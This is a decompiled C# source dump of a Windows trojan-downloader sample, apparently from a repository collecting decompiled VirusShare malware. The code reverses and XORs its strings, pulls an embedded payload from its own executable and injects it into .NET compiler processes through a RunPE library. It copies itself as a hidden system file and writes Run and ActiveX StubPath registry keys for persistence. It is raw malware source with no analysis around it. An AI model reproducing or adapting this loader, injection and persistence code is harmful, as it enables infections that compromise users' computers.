this.U5rbzma1hlby3eyyhjbmc5kyd = this.U5rbzma1hlby3eyyhjbmc5kyd.Substring(0, this.U5rbzma1hlby3eyyhjbmc5kyd.Length - 4) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.");
Path.GetPathRoot(Environment.GetFolderPath(Environment.SpecialFolder.System));
switch (this.Odlyq3qfbpoq3mg0so5fipxwu)
{
case "0":
try
{
this.Odlyq3qfbpoq3mg0so5fipxwu = IntPtr.Size != 4 ? Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\46krowemarF\\TEN.tfosorciM\\") : Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.cbv\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
break;
}
catch (Exception ex)
{
break;
}
case "1":
this.Odlyq3qfbpoq3mg0so5fipxwu = Environment.GetEnvironmentVariable(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("ridniw")) + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("exe.csc\\72705.0.2v\\krowemarF\\TEN.tfosorciM\\");
break;
}
this.cwygyk0oxmm4oly4f = Convert.ToBoolean(strArray4[1]);
this.Obpmsku4cgcztab1lmoobkyt5 = strArray4[2];
this.gkgcqdokyjuxym4wq0314usgk = strArray4[3];
this.nd5mirnaddlzplmuj2yyvlyhv = strArray4[4];
this.Jxy14wwtwogymn1qrjcja2xpw = strArray4[5];
this.Mebghajzp0czroix5exzsbjcb = Convert.ToBoolean(strArray4[6]);
this.rkkwfbuqo0azkksqy = Convert.ToBoolean(strArray4[7]);
this.buvpnbb4jdddrparyku5zhpzb = Convert.ToBoolean(strArray4[8]);
this.cgkruwksz1uyngdvorfai14estiwjwa22 = Convert.ToBoolean(strArray4[9]);
this.nd5mirnaddlzplmuj2yyvlyhv = this.rxto5yfudomwo4quiatvxlgxu(this.nd5mirnaddlzplmuj2yyvlyhv);
MessageBoxButtons[] messageBoxButtonsArray = new MessageBoxButtons[6]
{
MessageBoxButtons.OK,
MessageBoxButtons.OKCancel,
MessageBoxButtons.YesNo,
MessageBoxButtons.YesNoCancel,
MessageBoxButtons.RetryCancel,
MessageBoxButtons.AbortRetryIgnore
};
MessageBoxIcon[] messageBoxIconArray = new MessageBoxIcon[5]
{
MessageBoxIcon.Hand,
MessageBoxIcon.Asterisk,
MessageBoxIcon.Question,
MessageBoxIcon.Exclamation,
MessageBoxIcon.None
};
if (!(this.H43ao0q1ckx2y3w0qhozixdn5 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1")))
return;
Thread.Sleep(this.Byijlyljtwhknkf5jkcwcjhnmxbyfow1f * 1000);
int num = (int) MessageBox.Show(this.vazu5g3yn2qoupbzrnflcm5ta, this.jfq5w2hqrukvsivotb2eaetcj, messageBoxButtonsArray[this.C2zbxxi4za2fdbthchmjymbz0], messageBoxIconArray[this.Zusxmm13kjq0lro02]);
}
public void fkjhdaxsce2gfuv1fe5y42qsk()
{
string executablePath = Application.ExecutablePath;
try
{
this.i4apa2zau4uyfet5mwpyrsauzpucwiech(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 55, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("2U1TFWIUJIOH2YSDWUUDE1JLPQHUHN0TQ"))));
this.Tts2baf3wiatv5ghnswu3fu4o = this.n321udrptnm3xnkdwdxsh0wft(executablePath, 38, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("PQDKZJWPOV44MQSBJ"));
if (this.act0dsy5xkcjtyk4udzmsxpor == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Tts2baf3wiatv5ghnswu3fu4o = this.h3mz2iy1yrgiwje2h(this.Tts2baf3wiatv5ghnswu3fu4o, this.vu05zlvgf2zzuc3uhqtm0qh2kdijzsnxb);
this.Tts2baf3wiatv5ghnswu3fu4o = this.pcbc3w2jxlqgmdfs0dlf3dbkc(this.Tts2baf3wiatv5ghnswu3fu4o);
if (!this.cxhxnrorc5mp1ujxhtq1kbke4)
{
this.zuc0g2puhfoogprwx4kio2wu1 = this.Xthp414gtl2l4oueqfpd4vbwz(0);
this.Gdjkuqh0cbgb2rrfkrtpdepl3.Invoke(this.zuc0g2puhfoogprwx4kio2wu1, new object[3]
{
(object) this.Tts2baf3wiatv5ghnswu3fu4o,
(object) this.Odlyq3qfbpoq3mg0so5fipxwu,
(object) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("")
});
}
else
this.Eapnz3st2tmrdospqmsffns5v(this.Tts2baf3wiatv5ghnswu3fu4o);
if (this.Fkgl04y45wljpapzd)
this.c55ygxxz3rp1vsemw5o013b42(this.Tts2baf3wiatv5ghnswu3fu4o, this.U5rbzma1hlby3eyyhjbmc5kyd, true);
string str;
if (!string.IsNullOrEmpty(this.Zjtchyef12cwxg4onylzlprmn))
{
str = this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + this.mqmfhbfuww2freoox;
Directory.CreateDirectory(this.Kkrle03d2ekkcyuc2c2102hjd + this.Zjtchyef12cwxg4onylzlprmn);
}
else
str = this.Kkrle03d2ekkcyuc2c2102hjd + this.mqmfhbfuww2freoox;
if (this.mehj1nkb5kab31y4pa5zzd3zh == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.Dxpmu5z21l0jogt41vcdm0t2p, str, 1);
if (this.Z2sx3vgolcrkx42a5b2bhnmdt == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.ljjgffrum0vanmiev3ujguzbfjpaluf1a, this.hdb50yp4mb51cxajtk2qahcip, str, 2);
if (this.wvlwdt5q3igbdkbluauqgzxazzitgesk2 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
this.Ruzxivkrma3hdd1il(this.Ns5tkmgwpxzdzhfzygk50izkv, this.Qmztipvjjobds0bdpgipbz14g, str, 3);
if (this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x)
{
byte[] bytes = System.IO.File.ReadAllBytes(Application.ExecutablePath);
if (!System.IO.File.Exists(str))
System.IO.File.WriteAllBytes(str, bytes);
if (System.IO.File.Exists(str))
{
if (this.hyrbz1kfxjvaxj0vistcunjymen3kporm == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.Hidden);
if (this.Ajiami1b52zvc3vohgymtmh5a == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.ReadOnly);
if (this.R3u01lftwibuhcd22 == wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("1"))
System.IO.File.SetAttributes(str, System.IO.File.GetAttributes(str) | FileAttributes.System);
}
}
this.Myk2onyuqzunnxikmdzm0nc2t(panz0mon2f5aateyhtphwozah.Dsknrcn3xgwm4kutqcymeqtg4(this.n321udrptnm3xnkdwdxsh0wft(executablePath, 95, wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("NDLAWVBMC2KZBPWFB5J3JGQNQ"))));
if (!this.cwygyk0oxmm4oly4f)
return;
this.Dsqyxep1xbkqqwuokcmpwlnunygdkudqf();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
}
private void Ruzxivkrma3hdd1il(
string u0jp0x5zrl0q5ayh3v2w1bp40,
string Ef15akjyi4th4fsci,
string iep4bqxi0rq5itx040ytg2d2x0q13s5of,
int Fzyx2nfbtm3vn3bdgfaytm0sm)
{
this.sdztd0ena42ywf4cfnspntfxhjgjjuo2x = true;
if (Fzyx2nfbtm3vn3bdgfaytm0sm == 1)
Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
if (Fzyx2nfbtm3vn3bdgfaytm0sm == 2)
Registry.LocalMachine.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40, true).SetValue(Ef15akjyi4th4fsci, (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
if (Fzyx2nfbtm3vn3bdgfaytm0sm != 3)
return;
RegistryKey subKey = Registry.LocalMachine.CreateSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci);
subKey.SetValue(wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("htaPbutS"), (object) iep4bqxi0rq5itx040ytg2d2x0q13s5of);
subKey.Close();
if (Registry.CurrentUser.OpenSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, true) == null)
return;
Registry.CurrentUser.DeleteSubKey(u0jp0x5zrl0q5ayh3v2w1bp40 + wisp1ff1rpzacn3jgfnasrkhmiolo44qt.Kdmkmnso0da20rhdguq3p4oj1cpbgyqri("\\") + Ef15akjyi4th4fsci, false);
}
private static void Main(string[] args) => new ekrod4bellvfxnmof().fkjhdaxsce2gfuv1fe5y42qsk();
}
}
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/panz0mon2f5aateyhtphwozah.cs
+33
View File
@@ -0,0 +1,33 @@
// Decompiled with JetBrains decompiler
// Type: panz0mon2f5aateyhtphwozah
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
using System.Text;
public static class panz0mon2f5aateyhtphwozah
{
public static string Dsknrcn3xgwm4kutqcymeqtg4(byte[] Re2ucj3x4frepzs3c)
{
StringBuilder stringBuilder = new StringBuilder();
for (int index = 0; index < Re2ucj3x4frepzs3c.Length; ++index)
{
char ch = Convert.ToChar(Re2ucj3x4frepzs3c[index]);
stringBuilder.Append(Convert.ToString(ch));
}
return stringBuilder.ToString();
}
public static byte[] ydxqx4ckpkuemhnp4n2eb4laj(string Kos13k2jgfqobt5uhqj5cspab)
{
byte[] numArray = new byte[Kos13k2jgfqobt5uhqj5cspab.Length];
for (int startIndex = 0; startIndex < Kos13k2jgfqobt5uhqj5cspab.Length; ++startIndex)
{
char ch = Convert.ToChar(Kos13k2jgfqobt5uhqj5cspab.Substring(startIndex, 1));
numArray[startIndex] = Convert.ToByte(ch);
}
return numArray;
}
}
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/runPE.dll
BIN
View File
Binary file not shown.
MSIL/Trojan-Downloader/Win32/V/Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe/wisp1ff1rpzacn3jgfnasrkhmiolo44qt.cs
+29
View File
@@ -0,0 +1,29 @@
// Decompiled with JetBrains decompiler
// Type: wisp1ff1rpzacn3jgfnasrkhmiolo44qt
// Assembly: hh2ifwz3, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 68766CC0-7547-4113-80E9-8D0602728CEB
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.VB.anrt-380e52e4d9ffde603129df7f732dbf8782a7e1ed33d5b4ff17391d0a97e97afe.exe
using System;
public static class wisp1ff1rpzacn3jgfnasrkhmiolo44qt
{
public static int jqzvokzk5t335inc0xp55epz5 = 129;
public static byte[] br40vohypenwwv4th(byte[] Zkk3bd233f1xrgcd4m411ibwr)
{
for (int index = 0; index < Zkk3bd233f1xrgcd4m411ibwr.Length; ++index)
{
char ch = (char) ((uint) Convert.ToChar(Zkk3bd233f1xrgcd4m411ibwr[index]) ^ (uint) wisp1ff1rpzacn3jgfnasrkhmiolo44qt.jqzvokzk5t335inc0xp55epz5);
Zkk3bd233f1xrgcd4m411ibwr[index] = Convert.ToByte(ch);
}
return Zkk3bd233f1xrgcd4m411ibwr;
}
public static string Kdmkmnso0da20rhdguq3p4oj1cpbgyqri(string s)
{
char[] charArray = s.ToCharArray();
Array.Reverse((Array) charArray);
return new string(charArray);
}
}